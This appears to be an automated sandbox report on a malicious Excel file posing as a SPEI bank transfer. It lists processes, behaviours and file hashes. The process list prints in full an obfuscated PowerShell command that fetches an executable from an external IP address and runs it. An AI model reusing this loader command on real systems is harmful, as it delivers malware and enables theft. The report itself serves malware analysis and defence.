Analysis
-
max time kernel
122s -
max time network
159s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
21-11-2024 00:48
Static task
static1
Behavioral task
behavioral1
Sample
21112024_0048_20112024_Transferencia SPEI.xls
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
21112024_0048_20112024_Transferencia SPEI.xls
Resource
win10v2004-20241007-en
General
-
Target
21112024_0048_20112024_Transferencia SPEI.xls
-
Size
1.1MB
-
MD5
2eb01e0a87e7c2c842bce6d75f34e083
-
SHA1
df9ae618023a951ebacb254ec51ac1306c87cc73
-
SHA256
d4bb6fcd2077fab4abe6012089f2bffbee52b0cc5b69ccc2b5e250672bee25be
-
SHA512
3a3f9649ef09b2b01dbabd2ca1c3291272590bb7ef56899eee58e058242ccb5b498e2e30cf302abc97cc2f6ec1dfe930d15d29a8ed2444108e204519d966735d
-
SSDEEP
24576:/uq9PLiijE2Z5Z2amC/gY/tMJE8F84LJQohy5bLFqQEbG1jcu:/uEPLiij7Z5ZK0g8tMpFjLJQohy5VqLQ
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE is not expected to spawn this process 1580 2984 mstsc.exe 29 -
Blocklisted process makes network request 3 IoCs
flow pid Process 12 2576 mshta.exe 13 2576 mshta.exe 15 2052 POWERsHELl.exE -
Downloads MZ/PE file
-
Evasion via Device Credential Deployment 2 IoCs
pid Process 2784 powershell.exe 2052 POWERsHELl.exE -
Executes dropped EXE 1 IoCs
pid Process 1096 winnit.exe -
Loads dropped DLL 4 IoCs
pid Process 2052 POWERsHELl.exE 2052 POWERsHELl.exE 2052 POWERsHELl.exE 1580 mstsc.exe -
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource yara_rule behavioral1/files/0x000800000001660e-64.dat autoit_exe -
Drops file in System32 directory 2 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk POWERsHELl.exE File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 1096 set thread context of 1608 1096 winnit.exe 39 PID 1608 set thread context of 2984 1608 svchost.exe 29 PID 1608 set thread context of 1580 1608 svchost.exe 41 PID 1580 set thread context of 2984 1580 mstsc.exe 29 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 8 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mstsc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language EXCEL.EXE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language POWERsHELl.exE Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language winnit.exe -
Enumerates system info in registry 2 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor EXCEL.EXE -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3063565911-2056067323-3330884624-1000\Software\Microsoft\Internet Explorer\Main mshta.exe Key created \Registry\User\S-1-5-21-3063565911-2056067323-3330884624-1000\SOFTWARE\Microsoft\Internet Explorer\IntelliForms\Storage2 mstsc.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2984 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 10 IoCs
pid Process 2052 POWERsHELl.exE 2784 powershell.exe 1608 svchost.exe 1608 svchost.exe 1608 svchost.exe 1608 svchost.exe 1580 mstsc.exe 1580 mstsc.exe 1580 mstsc.exe 1580 mstsc.exe -
Suspicious behavior: MapViewOfSection 6 IoCs
pid Process 1096 winnit.exe 1608 svchost.exe 2984 EXCEL.EXE 2984 EXCEL.EXE 1580 mstsc.exe 1580 mstsc.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 2052 POWERsHELl.exE Token: SeDebugPrivilege 2784 powershell.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
pid Process 1096 winnit.exe 1096 winnit.exe -
Suspicious use of SendNotifyMessage 2 IoCs
pid Process 1096 winnit.exe 1096 winnit.exe -
Suspicious use of SetWindowsHookEx 5 IoCs
pid Process 2984 EXCEL.EXE 2984 EXCEL.EXE 2984 EXCEL.EXE 2984 EXCEL.EXE 2984 EXCEL.EXE -
Suspicious use of WriteProcessMemory 29 IoCs
description pid Process procid_target PID 2576 wrote to memory of 2052 2576 mshta.exe 32 PID 2576 wrote to memory of 2052 2576 mshta.exe 32 PID 2576 wrote to memory of 2052 2576 mshta.exe 32 PID 2576 wrote to memory of 2052 2576 mshta.exe 32 PID 2052 wrote to memory of 2784 2052 POWERsHELl.exE 34 PID 2052 wrote to memory of 2784 2052 POWERsHELl.exE 34 PID 2052 wrote to memory of 2784 2052 POWERsHELl.exE 34 PID 2052 wrote to memory of 2784 2052 POWERsHELl.exE 34 PID 2052 wrote to memory of 1208 2052 POWERsHELl.exE 35 PID 2052 wrote to memory of 1208 2052 POWERsHELl.exE 35 PID 2052 wrote to memory of 1208 2052 POWERsHELl.exE 35 PID 2052 wrote to memory of 1208 2052 POWERsHELl.exE 35 PID 1208 wrote to memory of 1268 1208 csc.exe 36 PID 1208 wrote to memory of 1268 1208 csc.exe 36 PID 1208 wrote to memory of 1268 1208 csc.exe 36 PID 1208 wrote to memory of 1268 1208 csc.exe 36 PID 2052 wrote to memory of 1096 2052 POWERsHELl.exE 38 PID 2052 wrote to memory of 1096 2052 POWERsHELl.exE 38 PID 2052 wrote to memory of 1096 2052 POWERsHELl.exE 38 PID 2052 wrote to memory of 1096 2052 POWERsHELl.exE 38 PID 1096 wrote to memory of 1608 1096 winnit.exe 39 PID 1096 wrote to memory of 1608 1096 winnit.exe 39 PID 1096 wrote to memory of 1608 1096 winnit.exe 39 PID 1096 wrote to memory of 1608 1096 winnit.exe 39 PID 1096 wrote to memory of 1608 1096 winnit.exe 39 PID 2984 wrote to memory of 1580 2984 EXCEL.EXE 41 PID 2984 wrote to memory of 1580 2984 EXCEL.EXE 41 PID 2984 wrote to memory of 1580 2984 EXCEL.EXE 41 PID 2984 wrote to memory of 1580 2984 EXCEL.EXE 41
Processes
-
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\21112024_0048_20112024_Transferencia SPEI.xls"1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: MapViewOfSection
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:2984 -
C:\Windows\SysWOW64\mstsc.exe"C:\Windows\SysWOW64\mstsc.exe"2⤵
- Process spawned unexpected child process
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1580
-
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe -Embedding1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2576 -
C:\Windows\SysWOW64\WInDowsPOweRSHELl\v1.0\POWERsHELl.exE"C:\Windows\SYsTem32\WInDowsPOweRSHELl\v1.0\POWERsHELl.exE" "pOwErSHelL.exE -EX BYpaSs -NoP -W 1 -C dEvICECREdENTiAlDePLOymeNt ; IEX($(iEx('[SYsTEM.tExt.EncoDIng]'+[CHar]0x3A+[CHar]0X3a+'uTf8.GEtSTrInG([SYSteM.COnverT]'+[CHaR]58+[ChAr]58+'fROmbaSE64stRInG('+[chAR]34+'JEg2SjZDTWV2TSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBBZEQtdHlQRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1iRXJEZUZpTmlUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoIlVyTG1vbi5ETGwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlYkVMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRnRHNYWnRYRmUsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgUU9ELHVpbnQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBwWmx6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEltRHp4KTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRUhMIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQW1FU1BBQ0UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlbSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkSDZKNkNNZXZNOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTA3LjE3My40LjYxLzMxL3dpbm5pdC5leGUiLCIkRW5WOkFQUERBVEFcd2lubml0LmV4ZSIsMCwwKTtTdGFSdC1zbEVFUCgzKTtpZVggICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXHdpbm5pdC5leGUi'+[Char]0X22+'))')))"2⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- Loads dropped DLL
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2052 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX BYpaSs -NoP -W 1 -C dEvICECREdENTiAlDePLOymeNt3⤵
- Evasion via Device Credential Deployment
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2784
-
-
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\fmptw7qp.cmdline"3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1208 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9BC4.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC9BC3.tmp"4⤵
- System Location Discovery: System Language Discovery
PID:1268
-
-
-
C:\Users\Admin\AppData\Roaming\winnit.exe"C:\Users\Admin\AppData\Roaming\winnit.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1096 -
C:\Windows\SysWOW64\svchost.exe"C:\Users\Admin\AppData\Roaming\winnit.exe"4⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:1608
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
717B
MD5822467b728b7a66b081c91795373789a
SHA1d8f2f02e1eef62485a9feffd59ce837511749865
SHA256af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9
SHA512bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6
-
Filesize
504B
MD50b60282e9ddea43ca313d63ec56740ad
SHA1e7cc9ff054f23bdd36103a4e90cc9f7e8e8b214a
SHA256358893a6900a0c0cc4d1457dbe7bcdef7e24b7c437d3623806f23827caac2c13
SHA512ed83aaf8dd61a513ec6854b3ba948fcfd8d4ffcbefebe082330d320f0c234003ba0b290eada14f79836cffd792931eb19bd3539ab2801c9c00c244e228439024
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
Filesize192B
MD569608dde41aa8c568ef1291d34333c29
SHA142d0e9b0e857bd5ede988f93e60186ce4053e7c3
SHA2561c0bd98ffdd5d998b89574ab7f270e75913d854d2552a0cff309874f024012be
SHA5129f130a340d7188a8eece22980f2b7eea3419142a416787c5561946a8a0be56ecc551a56c13f326d08baccd082df24a57916733e44043f5d131a2d94848fd57a2
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\1087EC93233409051A3831D3D6C361C8
Filesize550B
MD55acd00b92a306bb4c89782eed9c96f39
SHA1538746f7a800e20eb30693ee406926b2ca467480
SHA256df6108c2c7ac2100714305e55d67489c09178d85069ce91540089e698b34e845
SHA51247c68f5c4b2fb2729143bd8965e9e1632d1aeaf8098013e7cabfe0e7144f7e67dbf1bfdb0599f1a45c13dbd017dcd68ac9528f9dd501e5be991b09cbb9ca1ae3
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015
Filesize342B
MD55c3d315c8f5f9ec03c9f84cd9617ba75
SHA182c2f636827f60515b856c3d9a0d392ec6efcc41
SHA2560b72500f1dfb4301a576c33d93de75a8251272d3e216940f1fd9766d17c060a4
SHA512ae445f045d00f664989d00185d78482927bb19e70cad1e5d2105e733887988ea8a511f0cf5c05ed2a5450c93166a2f6c4db736673a8d33ef555c38288cfaa559
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K3VL8XEP\generatethebstgoodpeoplesaroundtheworldwithgood[1].hta
Filesize8KB
MD5de4061dd97364abc29b7f7b2c28a3a1e
SHA14865eaa60ffd4b9b5b5fdc6753aafb6867fbb50d
SHA2567b1ac8ddfc4e58bf8909d11a5fe6085e4aefa48de2750b569ef73e3cb555f6a9
SHA5125c1652de15050b7ce4231315cab0afde5ca4112fc33f4f7dd71170110ec27d0c307e75b9b41556373711cae3a18e3752fb7ea4d2339d15cc6172a93d956c2d67
-
Filesize
70KB
MD549aebf8cbd62d92ac215b2923fb1b9f5
SHA11723be06719828dda65ad804298d0431f6aff976
SHA256b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b
-
Filesize
1KB
MD5b8083618e6c1f9fc449c26d626dad6ce
SHA1d76346578ac37248be6e6e104498be3a0eafe0e1
SHA256a330a4b67d147319e44db7dd8c531a847ac4504134b7c41418bd8820976afaf1
SHA51233e1ccb1fa61bbc531276e77adabb41e5cf32f1e6ce73d0602e39597167ab791505868f9eff0fb8b9e23f1fd7bad617bf454e1f52f296f2af619f43b5035ed53
-
Filesize
283KB
MD5b9aef5fc571d33a584126b52aeb0f4e8
SHA1a975ee1cfe6b9884ba9f2298b1c5cb073d5bd4c3
SHA2566101c11ee57917c64f8d0c59052979565a3188cc47e64a01f6e120be5bf51d0e
SHA512f49547da1fe28b9e994fbb0ecc08101c00dad76d79ad10b4c52a7f079c74a375999492a58ef67eb7ddf9de0386e0e6db3d6edc88cef49a8f8a18cc002a2be65c
-
Filesize
489KB
MD5910ae9fbda13a82f9410303b653fe0c6
SHA13de02829408f5320b01e4209c79cf4a9d45cde86
SHA25611ba415b7e3b91c4587dc73bec82caf92f62724d0e49782151e7764acca43cb5
SHA512a7564409603dec6184920aed608024db319e8548b872a022eecd91501c12da2fde5fab5b6ce6772f1ba5724cce9151ce79214bed5cb3b13d39e5e9ea254e51b0
-
Filesize
3KB
MD5234ed4a86139947e17e9c080483c69de
SHA1bf3b0a32d869aa9860fd06f0585e4d7fc2237bc3
SHA25621e4637e0541519fb4a19d9d4fe6f641a8069e838d18f8fa3b7536246e31d8c6
SHA5125c583c783409222ec23fc0af2fcf343c22a5e5c4b7dbb9f614dfd118d94a6464540cac3eee7b4e5c1ed8a966d9b193c6a62c6ab530c42df77e88c0c16a0817f5
-
Filesize
7KB
MD5498cbad40f5559141dd105068f6fda9c
SHA1c151bed32492b69303bf86ee093a98c3b2e22cf4
SHA2560b23710580ffff0df15aa3d9556d895f04d9d6455d60b9df4743626c50810863
SHA512f0dc6183c2a506aee760f76ed04b05223c54a5d7766d56b92936fc05917561a001995b546ff78150cc2a54a320d6708d4dddba12d4bea1c7220dd1d6e54cd2e5
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD5c502b15be1eab4b7a5888ee4c1f5217d
SHA1ab7085d5481a11f6bd20ccedd4a44ec95aa2176f
SHA256941436d67e5a9a88e1023118eb029e5bc8ef97064d2c14ccf76a4bf5d304d7c5
SHA512ff0cfc4ec23f09c532dd6ee52bbe99231b0184be59a495f1efdcaffaccb246913dfce7a209e7fa6bd83dbdde3f822b682c455d770743d7b1b7a7e031237fdeaf
-
Filesize
652B
MD5800aada8e01da3b68c0e730dc820bd7e
SHA1a5f022d328b2bcd38aa7e82fd266f36425eae143
SHA256047f293b3bc5591747ed7ef414220a45931a4be8310ce8ee53d18d8a188347e4
SHA51273d677a7e355913b0087fef19b5a1f685584b9214110dd777f71aaa643f2cdd510f8b5073f8462c184552ffb8fd50b191b95b3ef27d5dbcbd20bfe2080851447
-
Filesize
468B
MD548a7068c5ea30224362ecb07c9c9f0e0
SHA150311380942823baa1b6700fdada8374590c4cf6
SHA256bc65a6ea3909c162910f9ab3268b3d9c97ceb0e65fcb87b28a653c2d07b12136
SHA512f3e57c4f7a060a3140bd833723936a3a5eaa03d1397798c5db53a9185499250b2ee724ece3904f70fbda9b778198cd3f41ab09dc06c172bc2c08e36842b16f03
-
Filesize
309B
MD55a79b805d72f955278cd052eafcd4d97
SHA15dee24f0f6a7d175f45180b9bceb94432d30e1e9
SHA25615b216de072459eb732f81f73962c6648433ffe1bbed8d63b90e5ec4912f1598
SHA512cbccd5a0bea26fc4b60628bdbb3737174bd9ef103a4949e098d6b71f10e80a963967ac9658c9a96d6835be6914c791aef3fe39e9ef94e628461f0ae19345ee8b
-
Filesize
932KB
MD5661fd92d4eaeea3740649af5a484d7c8
SHA1c93f868890fee1475f8ec9e7607e26f5dce67d54
SHA25658a478f0560ea22c1bc194263f07cf6f3ecfe47d0c8b534a7bba185f28a1141f
SHA5121fac03c20139fde41d121e0adbd02d127261ce061509996087fc1c80baf2fe0d0f70fed6b83d38a85cfa2e07d038ff809161c7ecce31ec44ac8b89740d3db15d
-
Filesize
1.2MB
MD5c4e558e3ae2abda535f3bcf85eb36e1e
SHA101aa5269d85af968ec255ba40b9e52679f79ebaf
SHA2564171986e64cb8dbc618b0b403b4f994b57286bbd87e5b528763871df58883211
SHA512c247a2abd47cc2603b04f0bd4eb3a2f1bb18c3aab3883de0855404d7e92aa90084361cc3c74a6ecacadb97a80b950ae418766f061653ae00b850d4b1b036b2b1